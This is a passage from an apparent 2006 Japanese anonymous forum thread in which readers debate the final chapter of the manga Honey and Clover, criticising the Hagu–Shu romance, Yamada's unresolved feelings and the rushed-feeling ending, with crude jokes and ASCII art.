気になるだけだなー。

286 :花と名無しさん:2006/07/28(金) 14:29:21 ID:???0
森田とタケノコが失恋組で意気投合してればまだなんとか
なんで喧嘩別れやねん

287 :花と名無しさん:2006/07/28(金) 14:29:29 ID:???0
いや別に原作通りのオチでも良いけど、
書き方は他にないのかって事。
臭の発情とか山田が成長しないとか、単に他に思いつかなかっただけなんじゃないかと。
真山が好きだった山田って、最初は設定として上手く回転したけど、
段々制御できなくなったんじゃない?
もう作者自身にも「何故好きなのか分からない」みたいな。
 
レイプはしとらんだろw>真山

288 :花と名無しさん:2006/07/28(金) 14:29:50 ID:???O
飲み屋山田好きだよ。ラストの飲み屋のまっすぐさと包容力はとても良かった。

289 :花と名無しさん:2006/07/28(金) 14:30:07 ID:???0
最終回は真山が飲み屋以上に蚊帳の外だったのは
いただけないな

290 :花と名無しさん:2006/07/28(金) 14:31:03 ID:???0
>>287
ナチュラルにしてそうだと思ったけど

291 :花と名無しさん:2006/07/28(金) 14:31:07 ID:???0
俺単行本派だから最終回まだ見てないんだ
でもまぁこの二人がくっつかないで終わるってのは満足
9巻はすでに佳境に入ってる感じがするね

292 :花と名無しさん:2006/07/28(金) 14:32:37 ID:???0
はぁ?

293 :花と名無しさん:2006/07/28(金) 14:32:39 ID:???0
まあ山田は山田で一生真山が好きでいいんじゃないの
理化と真山ダメになるかもしれないし

294 :花と名無しさん:2006/07/28(金) 14:33:46 ID:???0
>>290
さすがに描いてもない事を正式設定として妄想するのはダメだろう…
まだ真山理花と何回ヤった妄想合戦の方が健全だ。

295 :花と名無しさん:2006/07/28(金) 14:33:53 ID:???O
山田が野宮気にするのは好かれてるからって・・商店街の男達は・・

296 :花と名無しさん:2006/07/28(金) 14:35:21 ID:???0
理花さん最後の出番は先生とのハグシーンか
あの体だから10年以内に死んでしまうかもね

297 :花と名無しさん:2006/07/28(金) 14:36:49 ID:???0
>>294
真山とリカは北海道以前もヤってたぽいしな
体を許すって事はレイプじゃないし

298 :花と名無しさん:2006/07/28(金) 14:37:17 ID:???0
         ヽ|/
       / ̄ ̄ ̄`ヽ、
      /         ヽ
     /  /〜\    |
     | (●) (●)   |
     |  / ̄⌒ ̄ヽ   |
 ⊂\/  ヽ  ̄~ ̄ ノ   \/⊃
   \/|  ` ̄ ̄    |\/


299 :花と名無しさん:2006/07/28(金) 14:46:09 ID:???0
「何回寝たか」か…
何もかもが懐かしい…
 
 
もうそれどころじゃないし。

300 :花と名無しさん:2006/07/28(金) 14:50:49 ID:???0
真山(お気に入り)は最初から幸せエンドに
竹本(スーパー普通人)は現実的な落とし方にもう確定してたんだろうな当初から
森田みたいな超人が普通の恋愛なんかしちゃイヤンみたいな

301 :花と名無しさん:2006/07/28(金) 14:57:59 ID:???O
山田は間違いなく束縛タイプだな

302 :花と名無しさん:2006/07/28(金) 15:17:45 ID:???0
あれだよみんな! 「BASARA」みたく、
番外編だけでコミック2冊分になるんだよ!
これで終わりのはずないジャン!!







と言ってみるテスト


303 :花と名無しさん:2006/07/28(金) 15:33:58 ID:???0
>>302
そこで森田とはぐの双子の娘と息子が平凡な人生で妥協している状態の竹本に会いに行って
そんな双子を見て2人を懐かしく思いつつ、このままの自分じゃダメだと思って一念発起して
仕事場で知り合った女の子を連れて旅立つんですね!

あれ・・・目から汗が・・・

304 :花と名無しさん:2006/07/28(金) 15:42:00 ID:???O
>>13>>17
ええええええ
今年一番のショックでした

305 :花と名無しさん:2006/07/28(金) 15:44:47 ID:???0
ああ・・・森田しぬよていだったのかもね。
なんかもう会えないよっていう鬱エンドにする予定だったって言ってたし

306 :花と名無しさん:2006/07/28(金) 15:50:51 ID:???0
じゃあ全員片想い一方通行のまま終わるってことを
作者は決め込んでたのかな?
案外森田が死ななくなったから、急遽修に出張らせてはぐを隔離させた?

307 :花と名無しさん:2006/07/28(金) 15:52:41 ID:???0
竹本がドでかサンドをめくってどんな殺人創作料理が出るのかと
ドキ☆ドキしたのに。。。
クローバーにはちみつだなんて臭が作ったに違いない

308 :花と名無しさん:2006/07/28(金) 15:56:06 ID:???0
しかし最後までカタルシスを得られないまんがだったな
それが味といえばそれまでだが

309 :花と名無しさん:2006/07/28(金) 15:58:21 ID:???0
もどかしい! せつない!
でも最後までそれだと、満足度ひくぅー(´・ω・`) って感じ。

310 :花と名無しさん:2006/07/28(金) 16:00:52 ID:???0
絶頂どころか性交まで行かず
前戯だけで終わったような…

それも、勘違いして間違ったところまさぐりあった挙句に
続けられなくなって終わっちゃったような感じ…

311 :花と名無しさん:2006/07/28(金) 16:01:50 ID:???0
みんなが集まって楽しげな場面でも素直にいいなぁって思えないもんな
モノローグが陰鬱としてるし 次の瞬間2トントラックに全員跳ねられててもおかしくない それがハチクロワールド

312 :花と名無しさん:2006/07/28(金) 16:13:22 ID:MvJXV6vC0
でも3〜7巻あたりの憂鬱はキラキラしてたよなあ。青春だからか。
8巻以降の鬱は同じハチクロ鬱でも秋風がふいとる。

313 :花と名無しさん:2006/07/28(金) 16:18:04 ID:???0
>310
無理矢理エチーに例えなくても・・・

314 :花と名無しさん:2006/07/28(金) 16:26:52 ID:???0
8巻は鬱とは言えないと思うけどな。
急に動き出した感じはするけど。
YYでの最終回からだな。本格的なのは。

315 :花と名無しさん:2006/07/28(金) 16:30:24 ID:???0
まさにオナニー全開でしたね。


316 :花と名無しさん :2006/07/28(金) 16:36:56 ID:???0
スラダンの最終回はマサルさん並みに唐突でびっくらこいたな
直前まで試合してたのにいきなり後日談になって
第1部完て。そんで途中でいきなり途切れたからいち2部始まるのかなと思っていたら
十年経った。
こうなったら年表だーー!!よりはマシなのかな

317 :花と名無しさん:2006/07/28(金) 16:40:04 ID:???0
竹本とはぐと修ちゃん幸せになって欲しかった
でもはぐがふたまた悪女になるから挫折した
真山は島流し希望

318 :花と名無しさん:2006/07/28(金) 16:44:11 ID:???0
コーラス買った
ミドリちゃんふせんが想像よりデカくてびびった

319 :花と名無しさん :2006/07/28(金) 16:47:47 ID:???0
ナナもハチクロもなんだか可愛くてオサレな雰囲気をなんとなく味わう感じが受けているのだ
ハチミツとクローバーのサンドイッチなんてなんだか
かわいくてオサレな雰囲気じゃん
でクローバーって食えるのか?
あとでべたべた洗って取っておくのかね

320 :花と名無しさん:2006/07/28(金) 16:55:03 ID:???0
真山から山田への返事はありがとう
はぐから竹本への返事もありがとう

321 :花と名無しさん:2006/07/28(金) 17:01:35 ID:???0
セカイ系からの緩やかな夜明け

主人公は武本君であり、彼の性格こそが作者のメッセージ、ハチクロの本質である。
前向きに、自分を歩かせ、世の中と向き合っていこう。
それでいて、まだまだ“せつなさ至上主義”だったりする。
そうだ、僕らはこれでいいのだ。

322 :花と名無しさん:2006/07/28(金) 17:03:03 ID:???0
俺も別れた彼女に好きだと言ったら返事はありがとう…orz

323 :花と名無しさん :2006/07/28(金) 17:12:02 ID:???0
言った事ある。友達だし〜も連発した事ある。
言っちゃいけないことだったのか。
基本的に自分の目的第1だからはぐの気持は何となくわかる。
絵がかけて生活できりゃいいじゃん。

324 :花と名無しさん:2006/07/28(金) 17:18:23 ID:???0
断る時はきっちりと。余計な事は一切言わない。
これ基本。

325 :花と名無しさん:2006/07/28(金) 17:22:19 ID:???O
このマンガ友達に勧められてるんですが面白いんですかぁ?なんかここ見る限り叩かれまくりだし…

326 :花と名無しさん:2006/07/28(金) 17:27:35 ID:???O
実物読んだけど想像より悪くなかった、良くも悪くも「ハチクロ」って感じで
終盤が酷すぎと改めて実感…特にはぐの大怪我と臭発情は蛇足の極み
作者が勘違いしちゃったのねとPCのエンブレム見て思った。

327 :花と名無しさん:2006/07/28(金) 17:27:58 ID:???0
>>325
がたがた言わずに見やがれ

328 :花と名無しさん:2006/07/28(金) 17:28:06 ID:???0
はぐって竹本のこときっちりフッたんだっけ?

329 :花と名無しさん:2006/07/28(金) 17:30:21 ID:???0
現実は竹本に厳しかった

330 :花と名無しさん:2006/07/28(金) 17:36:33 ID:???O
はぐの修ちゃんに返さなきゃいけないのセリフが
俺が修だったら 多分ショック受ける

331 :花と名無しさん:2006/07/28(金) 17:38:24 ID:???0
「何も返さなくていい。自分で見つけられる」
の台詞は臭へよりむしろ自分自身に言ってる気がする

332 :花と名無しさん:2006/07/28(金) 17:39:08 ID:???0
作品の方向性は違うが、だぁx3みたいに「これでいいのかよ?」と思うような
投げやりなハッピーエンドの方が後味すっきりで良いよな

333 :花と名無しさん:2006/07/28(金) 17:40:04 ID:???0
実は全員ウシかうさぎを擬人化した話だとか
クローバー食ったり血縁同士でサカったり

334 :花と名無しさん:2006/07/28(金) 17:41:17 ID:???0
山田は真山のことはちゃんとケジメつけて飲み屋と付き合えるの?

335 :花と名無しさん:2006/07/28(金) 17:41:30 ID:???0
臭って何歳の設定ですか?

336 :花と名無しさん:2006/07/28(金) 17:42:06 ID:???0
主要キャラは一応救われてはいるんじゃないかな?
報われてはいないけどさ。
竹本は恋には破れたけど、告白自体は出来たんだし就職(それも適職)も叶った。
散々な風味の森田も、どんな形であれ、はぐと気持ちは通じているし、
兄弟揃って光が見えてきたようなこと言ってるし。
真山も、リカの人生に関わることを許された感じだし、リカも前向きになりつつあり。
はぐは大きな怪我をしたことで、現実を知った。絵を描くことには長けていても、
生活能力はない。自立も無理っぽい。社会との仲介してくれる人がなんとしても必要。
だから自分のことを一番理解してくれていて、安心して自分を任せられる修を選んだ。
修もそれを望んだ。
山田は最後まで自分を偽らずに正直だった。(ウザさ全開ですが…)
あの終わり方も自分では飲み込めたつもりだけど、ここで皆が書いている
足りないところとか、伏線をきっちり解消できていたら、もっと良い作品に
なったのになぁ、と思うよ。残念。

337 :花と名無しさん:2006/07/28(金) 17:46:43 ID:ZLi5cnqd0
>>334
けじめはついてないけど野宮が離れようとすると山田が泣く程度には
仲良しってことで、すんごい妥協だと思う。失恋から立ち直る前向きな
話がよかったな。妥協で手近な男にいった、という安い印象だった。
あの2人のだらだら会話、ハチクロ全体の中で最低のシーンだ。臭の
「大好きだ」より嫌い。

338 :花と名無しさん:2006/07/28(金) 17:47:24 ID:???O
解消してない伏線なんてあったっけ

339 :花と名無しさん:2006/07/28(金) 17:48:52 ID:???0
料理下手だった竹本がすてきな奥さんになった件

340 :花と名無しさん:2006/07/28(金) 17:59:38 ID:???0
ハチクロ立ち読みしてきた。
最終回の感想としてはハグよりも山田がウザキモくてしょうがなかった。
最初のころの山田を返してくれよ…。

341 :花と名無しさん:2006/07/28(金) 18:04:33 ID:???0
山田は真山が本当に好きなのね
自分が野宮ならもういいやって思うけど
あんな状態なら

342 :花と名無しさん:2006/07/28(金) 18:09:59 ID:???0
山田は
こんだけしつこく想ってるんだから
叶えさせてあげればいいのにウミノも
何がしたいかサッパリ

343 :花と名無しさん:2006/07/28(金) 18:21:52 ID:???0
鳥取あたりで、山田の気持ちが真山から野宮に移ったか?と思ったのに、
リーダーを箱に閉じ込めて云々ではまだ真山が好きっぽくて
ハァ?状態だった。
野宮がんがれ野宮。君には美和子さんと山崎とリーダーと私が付いている。

344 :花と名無しさん:2006/07/28(金) 18:25:17 ID:???0
>>342
山田もはぐも本命とはくっつかなかったんだよな…。失恋組竹本、森田も遠いところに追いやられちゃったし。
山田もな、真山への気持ちにけりつけて成長して欲しかったな。野宮とくっつかどうかは別にして。

345 :花と名無しさん:2006/07/28(金) 18:27:33 ID:???0
現状維持したいだけでしょ。
新しい一歩を踏み出すときにも、いちいち過去を引き摺って、
いつでも古巣に戻る用意はできてますってだけ。

346 :花と名無しさん:2006/07/28(金) 18:29:01 ID:???0
やっぱり明らかに話数が足りない。端折りすぎ。
そして修がはぐを異性としてラブ!はほんとにイラナイ一撃。
今までどおり、娘のような妹のような存在でも充分話は進むのにね。
無理矢理で違和感。どう考えても、急に思いついたような展開だ。
この唐突さは作者の俳優萌えからきてるのか?

347 :花と名無しさん:2006/07/28(金) 18:36:30 ID:???0
確かに山田はすっぱり真山とけじめつけて幸せになって欲しかったなあ
作者は彼女をどうしたかったのか。
真山への思いも刷り込みってことなら殻を抜け出して
新しい男と一歩踏み出す爽やかなEDにしてあげても良かったのに。

348 :花と名無しさん:2006/07/28(金) 18:36:39 ID:???0
最終回からン年後〜のご近所物語かパラキスの最終話みたいな話になるんだよ

349 :花と名無しさん:2006/07/28(金) 18:42:41 ID:???0
作者は山田に対しては
ウザくても、恋が実らなくても
一途に想い続けるのが美しい
みたいなのを表現したかったのだろうか…

350 :花と名無しさん:2006/07/28(金) 18:46:14 ID:???0
全然美しくないですよ☆ ストーカーと紙・一・重♪

と作者に耳打ちしてあげたい。

351 :花と名無しさん:2006/07/28(金) 18:46:47 ID:???0
>>349
それなら野宮に対して甘えるのは止めて欲しい

352 :花と名無しさん:2006/07/28(金) 18:48:39 ID:???0
山田って美乳で美脚でスタイルいいし美人だし
陶芸で食ってくだけの才能もありそうだし
ウミノさんの理想の女子なんじゃない?
それでも片思いが報われないっていうのが
ウミノさんのカタルシスだったのかもよ

353 :花と名無しさん:2006/07/28(金) 18:49:53 ID:???0
>>351
そうなんだよねそれがなければ
漫画だからそういうウザイことも美化できると納得できる部分もあるんだろうけど
あまりに中途半端でただウザイだけになってしまった

354 :花と名無しさん:2006/07/28(金) 18:52:37 ID:???0
山田は真山が好きというのがパーソナリティだから
それを外すとキャラが死んでしまうというのもやっぱりある
山田の人気は良くも悪くもそこだろうし

355 :花と名無しさん:2006/07/28(金) 18:54:37 ID:???0
  |.... |:: |. (*‘ω‘ *)  .| ::|
  |.... |:: | ちんぽっぽ | ::|
  |.... |:: └──────┘ ::|
  \_|    ┌────┐   .|     ∧∧
      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄     (  _)  
             / ̄ ̄ ̄ ̄ ̄旦 ̄(_,   )  平和だなあ
            /             \
           | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|、_)
             ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄| ̄ ̄

356 :花と名無しさん:2006/07/28(金) 18:56:59 ID:???0
>>354
というか最後だからキャラのパーソナリティとか気にしなくても良いとおもうんだが
真山のことがなくても気の強い鉄人ってだけでも最初の頃はキャラかなり立ってたよ
この作者は片思いってのにこだわりすぎたな

357 :花と名無しさん:2006/07/28(金) 18:57:40 ID:A2chrK4V0
そういやー鳩は陶器で作ったのかな〜

358 :花と名無しさん:2006/07/28(金) 19:00:15 ID:???0
真山が好きじゃない山田なんて山田じゃない
ていうか飲み屋マジいらねえ

359 :花と名無しさん:2006/07/28(金) 19:00:20 ID:???0
>>356
一番初めの登場から真山ありきだったとは思うけどこの人は

360 :花と名無しさん:2006/07/28(金) 19:01:41 ID:???0
私はストーカー真山が嫌いだったので、
さっさと山田に見切りつけて新しい恋に旅立ってほしかったっす。

361 :花と名無しさん:2006/07/28(金) 19:03:15 ID:???0
>>360
同意だに

362 :花と名無しさん:2006/07/28(金) 19:07:34 ID:???0
何か色々小手先の表現は綺麗なんだけど、綺麗なんだけど・・・
・・・何とゆーか、限りなく打ち切りくさいんですけど。このラスト。

ハチクロって結構売れ線だと思ってたけど、そうじゃなかったのかな。
ここ2、3話の流れ見てると、何かどこかから「さっさと終了しる!」
みたいな指令が降りて、あわてて取りあえず終わらせたっぽい感じが
してきてならないんだけど。


363 :花と名無しさん:2006/07/28(金) 19:10:59 ID:???0
将棋漫画も控えてるし、ウミノさんが早くこの作品から開放されたかったんじゃないの?

364 :花と名無しさん:2006/07/28(金) 19:11:35 ID:???0
なんでこんな終わり方なんだろうね?
アニメとの兼ね合いなんだろうか。
NANAもアニメや映画化してるけど、余裕で連載中だし。ワケワカラン。

365 :花と名無しさん:2006/07/28(金) 19:15:20 ID:???O
山田が泣くのがキモすぎ

366 :花と名無しさん:2006/07/28(金) 19:16:02 ID:???O
>>331
あぁ なるほど.....そうかもね
なんか段々 最終回に対する感情が変わってきたわ
これはこれでOKかも
物足りなさは凄いあるが

367 :花と名無しさん:2006/07/28(金) 19:17:37 ID:???0
最終回前がひどすぎたから
最終回無理にまとめたようで自分はむしろ嫌だな

368 :花と名無しさん:2006/07/28(金) 19:18:24 ID:???O
山田可愛すぎ

369 :花と名無しさん:2006/07/28(金) 19:21:23 ID:???0
>>364
「漫画はあとこれくらいで終わらせますから」ってことで
アニメ化にGOサイン出したんだろうね。
修の恋愛発覚エピで無駄に残り分を消費してしまったから
こんなバタバタ感がうまれてしまったのかな。

370 :花と名無しさん:2006/07/28(金) 19:22:58 ID:???0
早く将棋漫画のほうを描きたいんだろう

371 :花と名無しさん:2006/07/28(金) 19:23:04 ID:???0
でもウミノさんずっと前から年表まで作ってちゃんとラスト考えてたって言ってたじゃん
ちゃんと考えてのラストなんだろ 打ち切りじゃなくて

372 :花と名無しさん:2006/07/28(金) 19:27:45 ID:???0
打ち切りじゃないなんてことはわかってるよw
「打ち切りくさい」感覚を受ける、ってだけのハナシだろ

373 :花と名無しさん:2006/07/28(金) 19:28:38 ID:???0
>>326
あれってウミノクマだよねぇ。なんだかねぇ。

374 :花と名無しさん:2006/07/28(金) 19:33:07 ID:???0
>>372
つまらないよwwwwwwwwwwwwwwwwww

375 :花と名無しさん:2006/07/28(金) 19:34:34 ID:???0
ま、ここ見てると半分くらいの人は満足したようで安心したよ。
羽海野さんも安心して次回作に取り掛かれるね。

376 :花と名無しさん:2006/07/28(金) 19:35:06 ID:???0
>>371
当初考えてたラストのままなのか、軌道修正したのかが気になる。

377 :374:2006/07/28(金) 19:38:00 ID:???0
すまん誤爆った

378 :花と名無しさん:2006/07/28(金) 19:41:23 ID:???0
修はぐが年表どおりなんてとても思えないんだが

379 :372:2006/07/28(金) 19:41:26 ID:???0
>>374>>377
自分でもツマラナイ返答だと思っていたからいいよ…気にせんで

380 :花と名無しさん:2006/07/28(金) 19:43:03 ID:???0
( ´_ゝ`)フーン

381 :花と名無しさん:2006/07/28(金) 19:43:16 ID:???0
>>378
禿同。
あれだけは修役の声優萩原?藤原?に影響受けたんじゃないかと
そこはかとなく思う。

382 :花と名無しさん:2006/07/28(金) 19:43:33 ID:???0
>>378
修がはぐの保護者のまま側にいるってなら、
年表通りかもと思えるんだけど、
今更異性としてってのがなー。
そんな伏線どこにもなかった。

383 :花と名無しさん:2006/07/28(金) 19:44:37 ID:???O
山田は妥協して野宮って訳じゃないと思うけどなあ
商店街の男たちとは明らかに違う訳だし
やっぱり山田は真山を引きずる気持ちと野宮が好きな気持ちがあって
簡単には切り替えできないんじゃないんじゃないか

山田がコロッとふっきれて野宮ラブ!になったらそれはそれで叩く読者もいるだろうし


別冊コーラスのインタビューでは
「山田さんは最後の最後で幸せにします」
「でも全くの別人みたいになって幸せになるんじゃなく行ったり戻ったりしながら幸せになってほしい」
みたいなこと作者がいってたから…

384 :花と名無しさん:2006/07/28(金) 19:48:44 ID:???0
>>383
>全くの別人みたいになって幸せに

そりゃ、これをやっちまったら
漫画作品に登場する一人のキャラの表現の在り方としてどうなの?レベルになるわな…


385 :花と名無しさん:2006/07/28(金) 19:49:02 ID:???O
今回で最終回て知らなくてコーラス読みおわって呆然としてる…
連載終わらせろ、とか早く進めろとか散々言われて何十巻も続く作品が
いくつもあるのに羽海野さんて頑固なのな。
でもあの世界の空気感が好きだった。もっとダラダラ続けてほしかったよ。(つД`)

386 :花と名無しさん:2006/07/28(金) 19:50:15 ID:???0
はぐと修のがなくてこのエンドだったらいいけど
残り話数少ないのに最後に無茶なエピをつめるからすごいモヤっと感残ったまま。
とても満足できないよ。

387 :花と名無しさん:2006/07/28(金) 19:50:31 ID:???0
>>383
だからそれは分かるし別にいいんだよ
最近のロリ化が著しい状態であそこで泣くからウザイ
最終的には修はぐよりも子供のおもりカップルになってしまった

388 :花と名無しさん:2006/07/28(金) 19:51:04 ID:???0
羽海野さんの、別媒体におけるハチクロに関する発言を
このスレでうっかり目にするたびに萎えるorz

389 :花と名無しさん:2006/07/28(金) 19:51:34 ID:???0
たけのこは全くの別人のようにされました

390 :花と名無しさん:2006/07/28(金) 19:53:31 ID:???0
何か物足りないラストではあったなあ。
もっとこう、違うラストをイメージしてた。
いきなり幕が下りちゃった感じでびっくり、修はぐ含めて。

そして森田がみんなの輪に最後にいなかった事がすごく寂しかった。
山田と野宮はああいう形で始まるのもいいと思う。頑張れ。

391 :花と名無しさん:2006/07/28(金) 19:56:01 ID:???O
しかしはぐサイドの話が好きだった人には
本当に未消化な無念な終わり方だったかもしれませんね

392 :花と名無しさん:2006/07/28(金) 19:56:22 ID:???0
森田とは上手くいかないことは最初から決まってたのかな

393 :花と名無しさん:2006/07/28(金) 19:59:36 ID:???0
山田と野宮は引っ付かないだろうな
なんかわかる

394 :花と名無しさん:2006/07/28(金) 20:02:11 ID:???0
ウミノさんがどう終わらせたかったのかはなんとなくわかる。
でも説明不足だ。
せめて臭のはぐに対する恋愛感情のくだりをカットして
しまえばよかったのにと思う。

395 :花と名無しさん:2006/07/28(金) 20:04:18 ID:???O
修はぐの恋愛要素さえ描かなきゃいい漫画だったのにね
何の意味があったんだろ

396 :花と名無しさん:2006/07/28(金) 20:08:36 ID:???0
>>395
恋愛要素なしでは、男女がずっと一緒にいるってのが説明できないと思ったのかな?
修には最後まで恋愛の蚊帳の外にいて欲しかったよ。
なんか、いきなり行司が廻し付けて相撲とりだしたような違和感。

397 :花と名無しさん:2006/07/28(金) 20:08:43 ID:???0
作者個人の萌えのみって気がする

398 :花と名無しさん:2006/07/28(金) 20:16:23 ID:???O
山田は、八巻ラストのモノローグにあるように恋に臆病になってる上に
野宮が好き=真山が好きな(だった)自分を否定することだと思い込んでるんだよね。
二人に対しての好きはそれぞれ別物で、2つが同時に存在しても構わないことを
認めるエピがあればよかったな。それが商店街の中でならなお良し。

399 :花と名無しさん:2006/07/28(金) 20:16:57 ID:???0
>>396
今までずっと擬似親子、擬似兄妹みたいな生活をしてたんだから、
いきなり男女の関係にすり替える必要性なかったと思うよ。

400 :花と名無しさん:2006/07/28(金) 20:19:40 ID:???0
やはり映画の影響なのかな
「この二人のカップリング萌えぇー」とか <修&はぐ

401 :花と名無しさん:2006/07/28(金) 20:23:07 ID:???0
>>396
原田・リカ・臭の同居はどうなるんだろうね?
原田亡きあとのリカ・臭の同居もどうなるんだろうね?

ヤったorヤらない解釈は色々だろうけど、あの同居は
性欲とか恋愛感情第一でしていたわけじゃないだろうにね。

はぐに対しては純粋に擬似親子で、臭の独り言で
「なあ原田。俺もそろそろいい人探そうかな。どう思うよ?」
なんて言いつつ学校の屋上でタバコふかすシーンでも
出しといてくれれば十分だったな。

402 :花と名無しさん:2006/07/28(金) 20:50:11 ID:???0
>>401
リカ→原田←臭 たぶんこうだろ

原田亡きあとのリカ・臭の同居は
私達一緒にいないほうがいいって結局破綻してるし

403 :花と名無しさん:2006/07/28(金) 20:59:26 ID:???0
>>401
あーそれいいね、昔の臭はそんな感じ。


404 :花と名無しさん:2006/07/28(金) 21:00:05 ID:???0
最終回はやっぱり賛否両論だけど
私も突っ込みたいところあるけど
でも最後の竹本君のモノローグにはグッときちゃったよ。
CUTIEからずっと読んでたから...。
これから連載が気になる漫画がなくなっちゃってプチ鬱状態です...。

405 :花と名無しさん:2006/07/28(金) 21:08:36 ID:???0
結局、臭はぐとかはぐのケガとか無駄な追加ネタに割く暇があったら、
もうちょっと人物達の感情描写を細かくして欲しかったというのが感想。
あの微妙すぎる事件があったから、自分はこのラストがむかつくんだと思う・・・
なんとなくだらだら続いてる日常の中ではぐは絵を選び、
竹本は遠くに行く決心をかため、山田は野宮の手をとって、真山はストーカーの成果が現れ、って
それじゃいけなかったのかな。
森田の事件はまあ描かないわけには行かなかったんだろけど、事件なんてそんくらいで充分だったよ・・・

406 :花と名無しさん:2006/07/28(金) 21:10:40 ID:???0
>>405ですが、要するに、
あのまずそうなサンドイッチも変な事件無くふつうペースのままで
終わりにもってこられたら、感動できたのに、と言いたかったのです。

407 :花と名無しさん:2006/07/28(金) 21:14:09 ID:???0
そうかもね。
急展開で、どう収めるか!?
って期待というか心配というかしすぎて
あまりにもあっけなかったから
ポカーンて感じ。
8巻までのノリならこれもありかと。
コーラスまだ読んでませんが。
立ち読みした人は
あのビニールテープ外したんですか・・・?

408 :花と名無しさん:2006/07/28(金) 21:17:17 ID:???0
>>402
それは原田を中心とした関係だけでなく、主要キャラ5人にも当てはまるような気がするな。
誰かが誰かとの関係の繋ぎとなっていて、それがいないと関係が成立しないというか。

真山は竹本がいなければはぐと個人的に関わることはまずありえかっただろうし
逆に竹本も真山がいなければ山田と個人的に関わることはなかったと。
(ある意味森田も全体の繋ぎ役なのかもしれないが)

409 :花と名無しさん:2006/07/28(金) 21:18:51 ID:???0
いやーいくらなんでもハチクロサンドはねーよ。
あのモンゴル行きのところでうまいこと自然な流れでクローバー入れたから
ハチミツはどう入ってくるのかなーと期待してたのに
ふざけんなウミノ。

410 :花と名無しさん:2006/07/28(金) 21:22:26 ID:???0
この話はどっちかっていうと「観覧車とクローバー」って感じ。語感がかわいくないが・・・
観覧車じゃなくってメリーゴーランドだったらかわいいけど
それだと森田とはぐしか乗らなそうだもんね。

411 :花と名無しさん:2006/07/28(金) 21:24:13 ID:???0
たけもっつぁんはあのハチクロサンド食べたのだろうか。

412 :花と名無しさん:2006/07/28(金) 21:24:26 ID:???0
メリーゴーランドとクローバーじゃなげえよ

413 :花と名無しさん:2006/07/28(金) 21:24:48 ID:???0
メリクロ

414 :花と名無しさん:2006/07/28(金) 21:25:27 ID:???0
メリクロ?かわいいかも。
しかしメリーゴーランドと四葉のクローバーの挟まったサンドイッチはとても不味そう

415 :花と名無しさん:2006/07/28(金) 21:26:53 ID:???0
ハニーとクローバーだったらハニクロだね!

416 :花と名無しさん:2006/07/28(金) 21:26:56 ID:???0
>>414
おいwww

417 :花と名無しさん:2006/07/28(金) 21:27:12 ID:???0
サンドイッチじゃなくてアニメOPみたいにホットケーキにすれば良かったと思う

418 :花と名無しさん:2006/07/28(金) 21:27:53 ID:???0
パンなんかにクローバー挟むなんて頭おかしいとしか思えない。
ハチミツでべとべとだし押し花にもできやしねぇ。

419 :花と名無しさん:2006/07/28(金) 21:28:28 ID:???0
あの「奇跡」のような日々は=四葉のクローバー
いつまでも「甘い」痛みとともに=ハチミツ
まわりつづけるんだ…=観覧車        (…とゴーインに解釈)

観覧車っていつからキーワードの仲間入りしてたっけ…

420 :花と名無しさん:2006/07/28(金) 21:28:32 ID:???0
観覧車とクローバーだとカンクロ。
歌舞伎役者のようだね。

421 :花と名無しさん:2006/07/28(金) 21:29:38 ID:???0
ロリコンとストーカーでよくね

422 :花と名無しさん:2006/07/28(金) 21:30:15 ID:???0
クローバーって食中毒起こす事あるの?

423 :花と名無しさん:2006/07/28(金) 21:30:34 ID:???0
>>421
賛成

424 :花と名無しさん:2006/07/28(金) 21:30:49 ID:???0
>>414
メリーゴーラウンドの馬をハンマーでぶっ叩き
破片を採取するはぐが目に浮かんだ

425 :花と名無しさん:2006/07/28(金) 21:30:56 ID:???0
>>417
おーいいねえそれ!

てかあれほんとに四葉なの?
バレ読んで、自分では三つ葉に一枚足して四葉に見せかけてはさんでんのかと思った。
いつのまにそんなに生えた?四葉。

426 :花と名無しさん:2006/07/28(金) 21:31:35 ID:???0
ロリコンとストーカー・・・

ロリスト

ローリングストーンズみたいでかっこいいね☆

427 :花と名無しさん:2006/07/28(金) 21:32:53 ID:???0
>>419
回り続ける観覧車のイメージは、どっちかってぇと
アニメの影響じゃ・・・?と思う。

428 :花と名無しさん:2006/07/28(金) 21:32:56 ID:???0
その理論で行くと
竹本はロリコンとストーカーが挟まったサンドイッチを渡される事になって
非常に可哀想。

429 :花と名無しさん:2006/07/28(金) 21:34:21 ID:???0
なんでもかんでも挟むなよ!

430 :花と名無しさん:2006/07/28(金) 21:34:49 ID:???0
森田が死ななくてよかった
人の死ってどうしても物語的に安っぽい流れになりそうだから

431 :花と名無しさん:2006/07/28(金) 21:35:02 ID:???0
>>428
まぁでも竹本自身もロリコンであるわけで・・・

432 :花と名無しさん:2006/07/28(金) 21:35:44 ID:???0
>>431 共食いorz

433 :花と名無しさん:2006/07/28(金) 21:38:16 ID:???0
>>422
防虫処理がされてない野草は
寄生虫がついていることもあるから
生のままだとアブナイね

434 :花と名無しさん:2006/07/28(金) 21:38:26 ID:???0
>>425
ほんとに四つ葉だったよ

435 :花と名無しさん:2006/07/28(金) 21:39:09 ID:???0
>>411
泣きながらかぶりついてた
でも細かい事だけど全部の段にハチミツが塗ってあったら持ちにくいし食べにくいな
竹本は3枚くらい掴んで食べてたけど、きっと手にハチミツべったりだろう

436 :花と名無しさん:2006/07/28(金) 21:39:44 ID:???0
今読んだが・・・・終わったね〜。
最後は見開きページとかにしてほしかったね。
しかしこんなラストならわざわざ臭ハグにしなくても良かったじゃん
なんかあっけないね

437 :花と名無しさん:2006/07/28(金) 21:40:48 ID:???0
>>435
きっといろんな意味で泣いてたんだろうな

438 :花と名無しさん:2006/07/28(金) 21:42:07 ID:???0
>>437
「食えばいいんだろ食えば!」が八割

439 :花と名無しさん:2006/07/28(金) 21:44:41 ID:???0
>>436
修はぐ・・・ありゃ一体なんだったんだろうな。
アニメやコミックスでは、無かったことにならないかな。

440 :花と名無しさん:2006/07/28(金) 21:46:15 ID:???0
>>439
それはそれで腹が立つ

441 :花と名無しさん:2006/07/28(金) 21:46:32 ID:???0
北斗の拳で言えばケンシロウがリンをいただきますしちゃうようなもんか

442 :花と名無しさん:2006/07/28(金) 21:48:43 ID:???O
今月号読んだ。
とりあえず作者乙、という感じです…が。
ハチクロという作品内における
「ああ好きさ!大好きさ!」
の必要性をまっったく理解できなかったのは私だけでしょうか。
コミクスは、あのシーンさえカットしてくれるなら売らないで手元に残しておいてもいい。

443 :花と名無しさん:2006/07/28(金) 21:50:48 ID:???0
>>441
